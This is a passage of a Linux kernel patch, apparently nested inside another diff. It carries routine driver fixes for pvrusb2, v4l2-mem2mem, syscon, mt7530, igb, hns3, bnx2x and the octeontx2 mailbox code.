+@@ -106,9 +108,7 @@ static void pvr2_context_check(struct pvr2_context *mp)
+ 		pvr2_trace(PVR2_TRACE_CTXT,
+ 			   "pvr2_context %p (initialize)", mp);
+ 		/* Finish hardware initialization */
+-		if (pvr2_hdw_initialize(mp->hdw,
+-					(void (*)(void *))pvr2_context_notify,
+-					mp)) {
++		if (pvr2_hdw_initialize(mp->hdw, pvr2_context_notify, mp)) {
+ 			mp->video_stream.stream =
+ 				pvr2_hdw_get_video_stream(mp->hdw);
+ 			/* Trigger interface initialization.  By doing this
+@@ -267,9 +267,9 @@ static void pvr2_context_exit(struct pvr2_context *mp)
+ void pvr2_context_disconnect(struct pvr2_context *mp)
+ {
+ 	pvr2_hdw_disconnect(mp->hdw);
+-	mp->disconnect_flag = !0;
+ 	if (!pvr2_context_shutok())
+ 		pvr2_context_notify(mp);
++	mp->disconnect_flag = !0;
+ }
+ 
+ 
+diff --git a/drivers/media/usb/pvrusb2/pvrusb2-dvb.c b/drivers/media/usb/pvrusb2/pvrusb2-dvb.c
+index 26811efe0fb58..9a9bae21c6147 100644
+--- a/drivers/media/usb/pvrusb2/pvrusb2-dvb.c
++++ b/drivers/media/usb/pvrusb2/pvrusb2-dvb.c
+@@ -88,8 +88,10 @@ static int pvr2_dvb_feed_thread(void *data)
+ 	return stat;
+ }
+ 
+-static void pvr2_dvb_notify(struct pvr2_dvb_adapter *adap)
++static void pvr2_dvb_notify(void *ptr)
+ {
++	struct pvr2_dvb_adapter *adap = ptr;
++
+ 	wake_up(&adap->buffer_wait_data);
+ }
+ 
+@@ -149,7 +151,7 @@ static int pvr2_dvb_stream_do_start(struct pvr2_dvb_adapter *adap)
+ 	}
+ 
+ 	pvr2_stream_set_callback(pvr->video_stream.stream,
+-				 (pvr2_stream_callback) pvr2_dvb_notify, adap);
++				 pvr2_dvb_notify, adap);
+ 
+ 	ret = pvr2_stream_set_buffer_count(stream, PVR2_DVB_BUFFER_COUNT);
+ 	if (ret < 0) return ret;
+diff --git a/drivers/media/usb/pvrusb2/pvrusb2-v4l2.c b/drivers/media/usb/pvrusb2/pvrusb2-v4l2.c
+index c04ab7258d645..d608b793fa847 100644
+--- a/drivers/media/usb/pvrusb2/pvrusb2-v4l2.c
++++ b/drivers/media/usb/pvrusb2/pvrusb2-v4l2.c
+@@ -1033,8 +1033,10 @@ static int pvr2_v4l2_open(struct file *file)
+ }
+ 
+ 
+-static void pvr2_v4l2_notify(struct pvr2_v4l2_fh *fhp)
++static void pvr2_v4l2_notify(void *ptr)
+ {
++	struct pvr2_v4l2_fh *fhp = ptr;
++
+ 	wake_up(&fhp->wait_data);
+ }
+ 
+@@ -1067,7 +1069,7 @@ static int pvr2_v4l2_iosetup(struct pvr2_v4l2_fh *fh)
+ 
+ 	hdw = fh->channel.mc_head->hdw;
+ 	sp = fh->pdi->stream->stream;
+-	pvr2_stream_set_callback(sp,(pvr2_stream_callback)pvr2_v4l2_notify,fh);
++	pvr2_stream_set_callback(sp, pvr2_v4l2_notify, fh);
+ 	pvr2_hdw_set_stream_type(hdw,fh->pdi->config);
+ 	if ((ret = pvr2_hdw_set_streaming(hdw,!0)) < 0) return ret;
+ 	return pvr2_ioread_set_enabled(fh->rhp,!0);
+@@ -1198,11 +1200,6 @@ static void pvr2_v4l2_dev_init(struct pvr2_v4l2_dev *dip,
+ 		dip->minor_type = pvr2_v4l_type_video;
+ 		nr_ptr = video_nr;
+ 		caps |= V4L2_CAP_VIDEO_CAPTURE | V4L2_CAP_AUDIO;
+-		if (!dip->stream) {
+-			pr_err(KBUILD_MODNAME
+-				": Failed to set up pvrusb2 v4l video dev due to missing stream instance\n");
+-			return;
+-		}
+ 		break;
+ 	case VFL_TYPE_VBI:
+ 		dip->config = pvr2_config_vbi;
+diff --git a/drivers/media/v4l2-core/v4l2-mem2mem.c b/drivers/media/v4l2-core/v4l2-mem2mem.c
+index be7fde1ed3eaa..97645d6509e1c 100644
+--- a/drivers/media/v4l2-core/v4l2-mem2mem.c
++++ b/drivers/media/v4l2-core/v4l2-mem2mem.c
+@@ -1084,11 +1084,17 @@ static int v4l2_m2m_register_entity(struct media_device *mdev,
+ 	entity->function = function;
+ 
+ 	ret = media_entity_pads_init(entity, num_pads, pads);
+-	if (ret)
++	if (ret) {
++		kfree(entity->name);
++		entity->name = NULL;
+ 		return ret;
++	}
+ 	ret = media_device_register_entity(mdev, entity);
+-	if (ret)
++	if (ret) {
++		kfree(entity->name);
++		entity->name = NULL;
+ 		return ret;
++	}
+ 
+ 	return 0;
+ }
+diff --git a/drivers/mfd/altera-sysmgr.c b/drivers/mfd/altera-sysmgr.c
+index 5d3715a28b28e..dbe1009943718 100644
+--- a/drivers/mfd/altera-sysmgr.c
++++ b/drivers/mfd/altera-sysmgr.c
+@@ -110,7 +110,9 @@ struct regmap *altr_sysmgr_regmap_lookup_by_phandle(struct device_node *np,
+ 
+ 	dev = driver_find_device_by_of_node(&altr_sysmgr_driver.driver,
+ 					    (void *)sysmgr_np);
+-	of_node_put(sysmgr_np);
++	if (property)
++		of_node_put(sysmgr_np);
++
+ 	if (!dev)
+ 		return ERR_PTR(-EPROBE_DEFER);
+ 
+diff --git a/drivers/mfd/syscon.c b/drivers/mfd/syscon.c
+index 6196724ef39bb..ecfe151220919 100644
+--- a/drivers/mfd/syscon.c
++++ b/drivers/mfd/syscon.c
+@@ -223,7 +223,9 @@ struct regmap *syscon_regmap_lookup_by_phandle(struct device_node *np,
+ 		return ERR_PTR(-ENODEV);
+ 
+ 	regmap = syscon_node_to_regmap(syscon_np);
+-	of_node_put(syscon_np);
++
++	if (property)
++		of_node_put(syscon_np);
+ 
+ 	return regmap;
+ }
+diff --git a/drivers/mmc/host/wmt-sdmmc.c b/drivers/mmc/host/wmt-sdmmc.c
+index 9aa3027ca25e4..f2abebb2d8574 100644
+--- a/drivers/mmc/host/wmt-sdmmc.c
++++ b/drivers/mmc/host/wmt-sdmmc.c
+@@ -886,7 +886,6 @@ static int wmt_mci_remove(struct platform_device *pdev)
+ {
+ 	struct mmc_host *mmc;
+ 	struct wmt_mci_priv *priv;
+-	struct resource *res;
+ 	u32 reg_tmp;
+ 
+ 	mmc = platform_get_drvdata(pdev);
+@@ -914,9 +913,6 @@ static int wmt_mci_remove(struct platform_device *pdev)
+ 	clk_disable_unprepare(priv->clk_sdmmc);
+ 	clk_put(priv->clk_sdmmc);
+ 
+-	res = platform_get_resource(pdev, IORESOURCE_MEM, 0);
+-	release_mem_region(res->start, resource_size(res));
+-
+ 	mmc_free_host(mmc);
+ 
+ 	dev_info(&pdev->dev, "WMT MCI device removed\n");
+diff --git a/drivers/mtd/maps/physmap-core.c b/drivers/mtd/maps/physmap-core.c
+index 19dad5a23f944..8cdb3512107d3 100644
+--- a/drivers/mtd/maps/physmap-core.c
++++ b/drivers/mtd/maps/physmap-core.c
+@@ -524,7 +524,7 @@ static int physmap_flash_probe(struct platform_device *dev)
+ 		if (!info->maps[i].phys)
+ 			info->maps[i].phys = res->start;
+ 
+-		info->win_order = get_bitmask_order(resource_size(res)) - 1;
++		info->win_order = fls64(resource_size(res)) - 1;
+ 		info->maps[i].size = BIT(info->win_order +
+ 					 (info->gpios ?
+ 					  info->gpios->ndescs : 0));
+diff --git a/drivers/mtd/nand/raw/lpc32xx_mlc.c b/drivers/mtd/nand/raw/lpc32xx_mlc.c
+index 452ecaf7775ac..1cfe3dd0bad4d 100644
+--- a/drivers/mtd/nand/raw/lpc32xx_mlc.c
++++ b/drivers/mtd/nand/raw/lpc32xx_mlc.c
+@@ -303,8 +303,9 @@ static int lpc32xx_nand_device_ready(struct nand_chip *nand_chip)
+ 	return 0;
+ }
+ 
+-static irqreturn_t lpc3xxx_nand_irq(int irq, struct lpc32xx_nand_host *host)
++static irqreturn_t lpc3xxx_nand_irq(int irq, void *data)
+ {
++	struct lpc32xx_nand_host *host = data;
+ 	uint8_t sr;
+ 
+ 	/* Clear interrupt flag by reading status */
+@@ -779,7 +780,7 @@ static int lpc32xx_nand_probe(struct platform_device *pdev)
+ 		goto release_dma_chan;
+ 	}
+ 
+-	if (request_irq(host->irq, (irq_handler_t)&lpc3xxx_nand_irq,
++	if (request_irq(host->irq, &lpc3xxx_nand_irq,
+ 			IRQF_TRIGGER_HIGH, DRV_NAME, host)) {
+ 		dev_err(&pdev->dev, "Error requesting NAND IRQ\n");
+ 		res = -ENXIO;
+diff --git a/drivers/net/dsa/mt7530.c b/drivers/net/dsa/mt7530.c
+index b988c8a40d536..07065c1af55e4 100644
+--- a/drivers/net/dsa/mt7530.c
++++ b/drivers/net/dsa/mt7530.c
+@@ -998,20 +998,56 @@ static void mt7530_setup_port5(struct dsa_switch *ds, phy_interface_t interface)
+ 	mutex_unlock(&priv->reg_mutex);
+ }
+ 
++/* On page 205, section "8.6.3 Frame filtering" of the active standard, IEEE Std
++ * 802.1Q™-2022, it is stated that frames with 01:80:C2:00:00:00-0F as MAC DA
++ * must only be propagated to C-VLAN and MAC Bridge components. That means
++ * VLAN-aware and VLAN-unaware bridges. On the switch designs with CPU ports,
++ * these frames are supposed to be processed by the CPU (software). So we make
++ * the switch only forward them to the CPU port. And if received from a CPU
++ * port, forward to a single port. The software is responsible of making the
++ * switch conform to the latter by setting a single port as destination port on
++ * the special tag.
++ *
++ * This switch intellectual property cannot conform to this part of the standard
++ * fully. Whilst the REV_UN frame tag covers the remaining :04-0D and :0F MAC
++ * DAs, it also includes :22-FF which the scope of propagation is not supposed
++ * to be restricted for these MAC DAs.
++ */
+ static void
+ mt753x_trap_frames(struct mt7530_priv *priv)
+ {
+-	/* Trap BPDUs to the CPU port(s) */
+-	mt7530_rmw(priv, MT753X_BPC, MT753X_BPDU_PORT_FW_MASK,
++	/* Trap 802.1X PAE frames and BPDUs to the CPU port(s) and egress them
++	 * VLAN-untagged.
++	 */
++	mt7530_rmw(priv, MT753X_BPC, MT753X_PAE_EG_TAG_MASK |
++		   MT753X_PAE_PORT_FW_MASK | MT753X_BPDU_EG_TAG_MASK |
++		   MT753X_BPDU_PORT_FW_MASK,
++		   MT753X_PAE_EG_TAG(MT7530_VLAN_EG_UNTAGGED) |
++		   MT753X_PAE_PORT_FW(MT753X_BPDU_CPU_ONLY) |
++		   MT753X_BPDU_EG_TAG(MT7530_VLAN_EG_UNTAGGED) |
+ 		   MT753X_BPDU_CPU_ONLY);
+ 
+-	/* Trap 802.1X PAE frames to the CPU port(s) */
+-	mt7530_rmw(priv, MT753X_BPC, MT753X_PAE_PORT_FW_MASK,
+-		   MT753X_PAE_PORT_FW(MT753X_BPDU_CPU_ONLY));
++	/* Trap frames with :01 and :02 MAC DAs to the CPU port(s) and egress
++	 * them VLAN-untagged.
++	 */
++	mt7530_rmw(priv, MT753X_RGAC1, MT753X_R02_EG_TAG_MASK |
++		   MT753X_R02_PORT_FW_MASK | MT753X_R01_EG_TAG_MASK |
++		   MT753X_R01_PORT_FW_MASK,
++		   MT753X_R02_EG_TAG(MT7530_VLAN_EG_UNTAGGED) |
++		   MT753X_R02_PORT_FW(MT753X_BPDU_CPU_ONLY) |
++		   MT753X_R01_EG_TAG(MT7530_VLAN_EG_UNTAGGED) |
++		   MT753X_BPDU_CPU_ONLY);
+ 
+-	/* Trap LLDP frames with :0E MAC DA to the CPU port(s) */
+-	mt7530_rmw(priv, MT753X_RGAC2, MT753X_R0E_PORT_FW_MASK,
+-		   MT753X_R0E_PORT_FW(MT753X_BPDU_CPU_ONLY));
++	/* Trap frames with :03 and :0E MAC DAs to the CPU port(s) and egress
++	 * them VLAN-untagged.
++	 */
++	mt7530_rmw(priv, MT753X_RGAC2, MT753X_R0E_EG_TAG_MASK |
++		   MT753X_R0E_PORT_FW_MASK | MT753X_R03_EG_TAG_MASK |
++		   MT753X_R03_PORT_FW_MASK,
++		   MT753X_R0E_EG_TAG(MT7530_VLAN_EG_UNTAGGED) |
++		   MT753X_R0E_PORT_FW(MT753X_BPDU_CPU_ONLY) |
++		   MT753X_R03_EG_TAG(MT7530_VLAN_EG_UNTAGGED) |
++		   MT753X_BPDU_CPU_ONLY);
+ }
+ 
+ static int
+@@ -2187,11 +2223,11 @@ mt7530_setup(struct dsa_switch *ds)
+ 	 */
+ 	if (priv->mcm) {
+ 		reset_control_assert(priv->rstc);
+-		usleep_range(1000, 1100);
++		usleep_range(5000, 5100);
+ 		reset_control_deassert(priv->rstc);
+ 	} else {
+ 		gpiod_set_value_cansleep(priv->reset, 0);
+-		usleep_range(1000, 1100);
++		usleep_range(5000, 5100);
+ 		gpiod_set_value_cansleep(priv->reset, 1);
+ 	}
+ 
+@@ -2401,11 +2437,11 @@ mt7531_setup(struct dsa_switch *ds)
+ 	 */
+ 	if (priv->mcm) {
+ 		reset_control_assert(priv->rstc);
+-		usleep_range(1000, 1100);
++		usleep_range(5000, 5100);
+ 		reset_control_deassert(priv->rstc);
+ 	} else {
+ 		gpiod_set_value_cansleep(priv->reset, 0);
+-		usleep_range(1000, 1100);
++		usleep_range(5000, 5100);
+ 		gpiod_set_value_cansleep(priv->reset, 1);
+ 	}
+ 
+diff --git a/drivers/net/dsa/mt7530.h b/drivers/net/dsa/mt7530.h
+index 6202b0f8c3f34..fa2afa67ceb07 100644
+--- a/drivers/net/dsa/mt7530.h
++++ b/drivers/net/dsa/mt7530.h
+@@ -63,14 +63,33 @@ enum mt753x_id {
+ 
+ /* Registers for BPDU and PAE frame control*/
+ #define MT753X_BPC			0x24
+-#define  MT753X_BPDU_PORT_FW_MASK	GENMASK(2, 0)
++#define  MT753X_PAE_EG_TAG_MASK		GENMASK(24, 22)
++#define  MT753X_PAE_EG_TAG(x)		FIELD_PREP(MT753X_PAE_EG_TAG_MASK, x)
+ #define  MT753X_PAE_PORT_FW_MASK	GENMASK(18, 16)
+ #define  MT753X_PAE_PORT_FW(x)		FIELD_PREP(MT753X_PAE_PORT_FW_MASK, x)
++#define  MT753X_BPDU_EG_TAG_MASK	GENMASK(8, 6)
++#define  MT753X_BPDU_EG_TAG(x)		FIELD_PREP(MT753X_BPDU_EG_TAG_MASK, x)
++#define  MT753X_BPDU_PORT_FW_MASK	GENMASK(2, 0)
++
++/* Register for :01 and :02 MAC DA frame control */
++#define MT753X_RGAC1			0x28
++#define  MT753X_R02_EG_TAG_MASK		GENMASK(24, 22)
++#define  MT753X_R02_EG_TAG(x)		FIELD_PREP(MT753X_R02_EG_TAG_MASK, x)
++#define  MT753X_R02_PORT_FW_MASK	GENMASK(18, 16)
++#define  MT753X_R02_PORT_FW(x)		FIELD_PREP(MT753X_R02_PORT_FW_MASK, x)
++#define  MT753X_R01_EG_TAG_MASK		GENMASK(8, 6)
++#define  MT753X_R01_EG_TAG(x)		FIELD_PREP(MT753X_R01_EG_TAG_MASK, x)
++#define  MT753X_R01_PORT_FW_MASK	GENMASK(2, 0)
+ 
+ /* Register for :03 and :0E MAC DA frame control */
+ #define MT753X_RGAC2			0x2c
++#define  MT753X_R0E_EG_TAG_MASK		GENMASK(24, 22)
++#define  MT753X_R0E_EG_TAG(x)		FIELD_PREP(MT753X_R0E_EG_TAG_MASK, x)
+ #define  MT753X_R0E_PORT_FW_MASK	GENMASK(18, 16)
+ #define  MT753X_R0E_PORT_FW(x)		FIELD_PREP(MT753X_R0E_PORT_FW_MASK, x)
++#define  MT753X_R03_EG_TAG_MASK		GENMASK(8, 6)
++#define  MT753X_R03_EG_TAG(x)		FIELD_PREP(MT753X_R03_EG_TAG_MASK, x)
++#define  MT753X_R03_PORT_FW_MASK	GENMASK(2, 0)
+ 
+ enum mt753x_bpdu_port_fw {
+ 	MT753X_BPDU_FOLLOW_MFC,
+@@ -251,6 +270,7 @@ enum mt7530_port_mode {
+ enum mt7530_vlan_port_eg_tag {
+ 	MT7530_VLAN_EG_DISABLED = 0,
+ 	MT7530_VLAN_EG_CONSISTENT = 1,
++	MT7530_VLAN_EG_UNTAGGED = 4,
+ };
+ 
+ enum mt7530_vlan_port_attr {
+diff --git a/drivers/net/ethernet/amazon/ena/ena_netdev.c b/drivers/net/ethernet/amazon/ena/ena_netdev.c
+index 044b8afde69a0..9e82e7b9c3b72 100644
+--- a/drivers/net/ethernet/amazon/ena/ena_netdev.c
++++ b/drivers/net/ethernet/amazon/ena/ena_netdev.c
+@@ -3174,22 +3174,6 @@ static netdev_tx_t ena_start_xmit(struct sk_buff *skb, struct net_device *dev)
+ 	return NETDEV_TX_OK;
+ }
+ 
+-static u16 ena_select_queue(struct net_device *dev, struct sk_buff *skb,
+-			    struct net_device *sb_dev)
+-{
+-	u16 qid;
+-	/* we suspect that this is good for in--kernel network services that
+-	 * want to loop incoming skb rx to tx in normal user generated traffic,
+-	 * most probably we will not get to this
+-	 */
+-	if (skb_rx_queue_recorded(skb))
+-		qid = skb_get_rx_queue(skb);
+-	else
+-		qid = netdev_pick_tx(dev, skb, NULL);
+-
+-	return qid;
+-}
+-
+ static void ena_config_host_info(struct ena_com_dev *ena_dev, struct pci_dev *pdev)
+ {
+ 	struct device *dev = &pdev->dev;
+@@ -3359,7 +3343,6 @@ static const struct net_device_ops ena_netdev_ops = {
+ 	.ndo_open		= ena_open,
+ 	.ndo_stop		= ena_close,
+ 	.ndo_start_xmit		= ena_start_xmit,
+-	.ndo_select_queue	= ena_select_queue,
+ 	.ndo_get_stats64	= ena_get_stats64,
+ 	.ndo_tx_timeout		= ena_tx_timeout,
+ 	.ndo_change_mtu		= ena_change_mtu,
+diff --git a/drivers/net/ethernet/broadcom/bnx2x/bnx2x_cmn.h b/drivers/net/ethernet/broadcom/bnx2x/bnx2x_cmn.h
+index d8b1824c334d3..0bc1367fd6492 100644
+--- a/drivers/net/ethernet/broadcom/bnx2x/bnx2x_cmn.h
++++ b/drivers/net/ethernet/broadcom/bnx2x/bnx2x_cmn.h
+@@ -1002,9 +1002,6 @@ static inline void bnx2x_set_fw_mac_addr(__le16 *fw_hi, __le16 *fw_mid,
+ static inline void bnx2x_free_rx_mem_pool(struct bnx2x *bp,
+ 					  struct bnx2x_alloc_pool *pool)
+ {
+-	if (!pool->page)
+-		return;
+-
+ 	put_page(pool->page);
+ 
+ 	pool->page = NULL;
+@@ -1015,6 +1012,9 @@ static inline void bnx2x_free_rx_sge_range(struct bnx2x *bp,
+ {
+ 	int i;
+ 
++	if (!fp->page_pool.page)
++		return;
++
+ 	if (fp->mode == TPA_MODE_DISABLED)
+ 		return;
+ 
+diff --git a/drivers/net/ethernet/hisilicon/hns3/hns3_dcbnl.c b/drivers/net/ethernet/hisilicon/hns3/hns3_dcbnl.c
+index 3b6dbf158b98d..f72dc0cee30e5 100644
+--- a/drivers/net/ethernet/hisilicon/hns3/hns3_dcbnl.c
++++ b/drivers/net/ethernet/hisilicon/hns3/hns3_dcbnl.c
+@@ -76,7 +76,7 @@ static int hns3_dcbnl_ieee_delapp(struct net_device *ndev, struct dcb_app *app)
+ 	if (hns3_nic_resetting(ndev))
+ 		return -EBUSY;
+ 
+-	if (h->kinfo.dcb_ops->ieee_setapp)
++	if (h->kinfo.dcb_ops->ieee_delapp)
+ 		return h->kinfo.dcb_ops->ieee_delapp(h, app);
+ 
+ 	return -EOPNOTSUPP;
+diff --git a/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_main.c b/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_main.c
+index 48b0cb5ec5d29..27037ce795902 100644
+--- a/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_main.c
++++ b/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_main.c
+@@ -2990,7 +2990,10 @@ static int hclge_mac_init(struct hclge_dev *hdev)
+ 	int ret;
+ 
+ 	hdev->support_sfp_query = true;
+-	hdev->hw.mac.duplex = HCLGE_MAC_FULL;
++
++	if (!test_bit(HCLGE_STATE_RST_HANDLING, &hdev->state))
++		hdev->hw.mac.duplex = HCLGE_MAC_FULL;
++
+ 	ret = hclge_cfg_mac_speed_dup_hw(hdev, hdev->hw.mac.speed,
+ 					 hdev->hw.mac.duplex, hdev->hw.mac.lane_num);
+ 	if (ret)
+diff --git a/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_ptp.c b/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_ptp.c
+index a40b1583f1149..0f06f95b09bc2 100644
+--- a/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_ptp.c
++++ b/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_ptp.c
+@@ -120,7 +120,7 @@ void hclge_ptp_get_rx_hwts(struct hnae3_handle *handle, struct sk_buff *skb,
+ 	u64 ns = nsec;
+ 	u32 sec_h;
+ 
+-	if (!test_bit(HCLGE_PTP_FLAG_RX_EN, &hdev->ptp->flags))
++	if (!hdev->ptp || !test_bit(HCLGE_PTP_FLAG_RX_EN, &hdev->ptp->flags))
+ 		return;
+ 
+ 	/* Since the BD does not have enough space for the higher 16 bits of
+diff --git a/drivers/net/ethernet/intel/igb/igb_main.c b/drivers/net/ethernet/intel/igb/igb_main.c
+index 45ce4ed16146e..81d9a5338be5e 100644
+--- a/drivers/net/ethernet/intel/igb/igb_main.c
++++ b/drivers/net/ethernet/intel/igb/igb_main.c
+@@ -6926,44 +6926,31 @@ static void igb_extts(struct igb_adapter *adapter, int tsintr_tt)
+ static void igb_tsync_interrupt(struct igb_adapter *adapter)
+ {
+ 	struct e1000_hw *hw = &adapter->hw;
+-	u32 ack = 0, tsicr = rd32(E1000_TSICR);
++	u32 tsicr = rd32(E1000_TSICR);
+ 	struct ptp_clock_event event;
+ 
+ 	if (tsicr & TSINTR_SYS_WRAP) {
+ 		event.type = PTP_CLOCK_PPS;
+ 		if (adapter->ptp_caps.pps)
+ 			ptp_clock_event(adapter->ptp_clock, &event);
+-		ack |= TSINTR_SYS_WRAP;
+ 	}
+ 
+ 	if (tsicr & E1000_TSICR_TXTS) {
+ 		/* retrieve hardware timestamp */
+ 		schedule_work(&adapter->ptp_tx_work);
+-		ack |= E1000_TSICR_TXTS;
+ 	}
+ 
+-	if (tsicr & TSINTR_TT0) {
++	if (tsicr & TSINTR_TT0)
+ 		igb_perout(adapter, 0);
+-		ack |= TSINTR_TT0;
+-	}
+ 
+-	if (tsicr & TSINTR_TT1) {
++	if (tsicr & TSINTR_TT1)
+ 		igb_perout(adapter, 1);
+-		ack |= TSINTR_TT1;
+-	}
+ 
+-	if (tsicr & TSINTR_AUTT0) {
++	if (tsicr & TSINTR_AUTT0)
+ 		igb_extts(adapter, 0);
+-		ack |= TSINTR_AUTT0;
+-	}
+ 
+-	if (tsicr & TSINTR_AUTT1) {
++	if (tsicr & TSINTR_AUTT1)
+ 		igb_extts(adapter, 1);
+-		ack |= TSINTR_AUTT1;
+-	}
+-
+-	/* acknowledge the interrupts */
+-	wr32(E1000_TSICR, ack);
+ }
+ 
+ static irqreturn_t igb_msix_other(int irq, void *data)
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/cgx.c b/drivers/net/ethernet/marvell/octeontx2/af/cgx.c
+index 90be87dc105d3..e6fe599f7bf3a 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/cgx.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/cgx.c
+@@ -1346,7 +1346,7 @@ static irqreturn_t cgx_fwi_event_handler(int irq, void *data)
+ 
+ 		/* Release thread waiting for completion  */
+ 		lmac->cmd_pend = false;
+-		wake_up_interruptible(&lmac->wq_cmd_cmplt);
++		wake_up(&lmac->wq_cmd_cmplt);
+ 		break;
+ 	case CGX_EVT_ASYNC:
+ 		if (cgx_event_is_linkevent(event))
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/mbox.c b/drivers/net/ethernet/marvell/octeontx2/af/mbox.c
+index 9690ac01f02c8..7d741e3ba8c51 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/mbox.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/mbox.c
+@@ -214,11 +214,12 @@ int otx2_mbox_busy_poll_for_rsp(struct otx2_mbox *mbox, int devid)
+ }
+ EXPORT_SYMBOL(otx2_mbox_busy_poll_for_rsp);
+ 
+-void otx2_mbox_msg_send(struct otx2_mbox *mbox, int devid)
++static void otx2_mbox_msg_send_data(struct otx2_mbox *mbox, int devid, u64 data)
+ {
+ 	struct otx2_mbox_dev *mdev = &mbox->dev[devid];
+ 	struct mbox_hdr *tx_hdr, *rx_hdr;
+ 	void *hw_mbase = mdev->hwbase;
++	u64 intr_val;
+ 
+ 	tx_hdr = hw_mbase + mbox->tx_start;
+ 	rx_hdr = hw_mbase + mbox->rx_start;
+@@ -254,14 +255,52 @@ void otx2_mbox_msg_send(struct otx2_mbox *mbox, int devid)
+ 
+ 	spin_unlock(&mdev->mbox_lock);
+ 
++	/* Check if interrupt pending */
++	intr_val = readq((void __iomem *)mbox->reg_base +
++		     (mbox->trigger | (devid << mbox->tr_shift)));
++
++	intr_val |= data;
+ 	/* The interrupt should be fired after num_msgs is written
+ 	 * to the shared memory
+ 	 */
+-	writeq(1, (void __iomem *)mbox->reg_base +
++	writeq(intr_val, (void __iomem *)mbox->reg_base +
+ 	       (mbox->trigger | (devid << mbox->tr_shift)));
+ }
++
++void otx2_mbox_msg_send(struct otx2_mbox *mbox, int devid)
++{
++	otx2_mbox_msg_send_data(mbox, devid, MBOX_DOWN_MSG);
++}
+ EXPORT_SYMBOL(otx2_mbox_msg_send);
+ 
++void otx2_mbox_msg_send_up(struct otx2_mbox *mbox, int devid)
++{
++	otx2_mbox_msg_send_data(mbox, devid, MBOX_UP_MSG);
++}
++EXPORT_SYMBOL(otx2_mbox_msg_send_up);
++
++bool otx2_mbox_wait_for_zero(struct otx2_mbox *mbox, int devid)
++{
++	u64 data;
++
++	data = readq((void __iomem *)mbox->reg_base +
++		     (mbox->trigger | (devid << mbox->tr_shift)));
++
++	/* If data is non-zero wait for ~1ms and return to caller
++	 * whether data has changed to zero or not after the wait.
++	 */
++	if (!data)
++		return true;
++
++	usleep_range(950, 1000);
++
++	data = readq((void __iomem *)mbox->reg_base +
++		     (mbox->trigger | (devid << mbox->tr_shift)));
++
++	return data == 0;
++}
++EXPORT_SYMBOL(otx2_mbox_wait_for_zero);
++
+ struct mbox_msghdr *otx2_mbox_alloc_msg_rsp(struct otx2_mbox *mbox, int devid,
+ 					    int size, int size_rsp)
+ {
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/mbox.h b/drivers/net/ethernet/marvell/octeontx2/af/mbox.h
+index 03ebabd616353..be70269e91684 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/mbox.h
++++ b/drivers/net/ethernet/marvell/octeontx2/af/mbox.h
+@@ -16,6 +16,9 @@
+ 
+ #define MBOX_SIZE		SZ_64K
+ 
++#define MBOX_DOWN_MSG		1
++#define MBOX_UP_MSG		2
++
+ /* AF/PF: PF initiated, PF/VF VF initiated */
+ #define MBOX_DOWN_RX_START	0
+ #define MBOX_DOWN_RX_SIZE	(46 * SZ_1K)
+@@ -101,6 +104,7 @@ int otx2_mbox_regions_init(struct otx2_mbox *mbox, void __force **hwbase,
+ 			   struct pci_dev *pdev, void __force *reg_base,
+ 			   int direction, int ndevs, unsigned long *bmap);
+ void otx2_mbox_msg_send(struct otx2_mbox *mbox, int devid);
++void otx2_mbox_msg_send_up(struct otx2_mbox *mbox, int devid);
+ int otx2_mbox_wait_for_rsp(struct otx2_mbox *mbox, int devid);
+ int otx2_mbox_busy_poll_for_rsp(struct otx2_mbox *mbox, int devid);
+ struct mbox_msghdr *otx2_mbox_alloc_msg_rsp(struct otx2_mbox *mbox, int devid,
+@@ -118,6 +122,8 @@ static inline struct mbox_msghdr *otx2_mbox_alloc_msg(struct otx2_mbox *mbox,
+ 	return otx2_mbox_alloc_msg_rsp(mbox, devid, size, 0);
+ }
+ 
++bool otx2_mbox_wait_for_zero(struct otx2_mbox *mbox, int devid);
++
+ /* Mailbox message types */
+ #define MBOX_MSG_MASK				0xFFFF
+ #define MBOX_MSG_INVALID			0xFFFE
+@@ -196,6 +202,9 @@ M(CPT_STATS,            0xA05, cpt_sts, cpt_sts_req, cpt_sts_rsp)	\
+ M(CPT_RXC_TIME_CFG,     0xA06, cpt_rxc_time_cfg, cpt_rxc_time_cfg_req,  \
+ 			       msg_rsp)                                 \
+ M(CPT_CTX_CACHE_SYNC,   0xA07, cpt_ctx_cache_sync, msg_req, msg_rsp)    \
++M(CPT_LF_RESET,         0xA08, cpt_lf_reset, cpt_lf_rst_req, msg_rsp)	\
++M(CPT_FLT_ENG_INFO,     0xA09, cpt_flt_eng_info, cpt_flt_eng_info_req,	\
++			       cpt_flt_eng_info_rsp)			\
+ /* SDP mbox IDs (range 0x1000 - 0x11FF) */				\
+ M(SET_SDP_CHAN_INFO, 0x1000, set_sdp_chan_info, sdp_chan_info_msg, msg_rsp) \
+ M(GET_SDP_CHAN_INFO, 0x1001, get_sdp_chan_info, msg_req, sdp_get_chan_info_msg) \
+@@ -1702,6 +1711,28 @@ struct cpt_inst_lmtst_req {
+ 	u64 rsvd;
+ };
+ 
++/* Mailbox message format to request for CPT LF reset */
++struct cpt_lf_rst_req {
++	struct mbox_msghdr hdr;
++	u32 slot;
++	u32 rsvd;
++};
++
++/* Mailbox message format to request for CPT faulted engines */
++struct cpt_flt_eng_info_req {
++	struct mbox_msghdr hdr;
++	int blkaddr;
++	bool reset;
++	u32 rsvd;
++};
++
++struct cpt_flt_eng_info_rsp {
++	struct mbox_msghdr hdr;
++	u64 flt_eng_map[CPT_10K_AF_INT_VEC_RVU];
++	u64 rcvrd_eng_map[CPT_10K_AF_INT_VEC_RVU];
++	u64 rsvd;
++};
++
+ struct sdp_node_info {
+ 	/* Node to which this PF belons to */
+ 	u8 node_id;
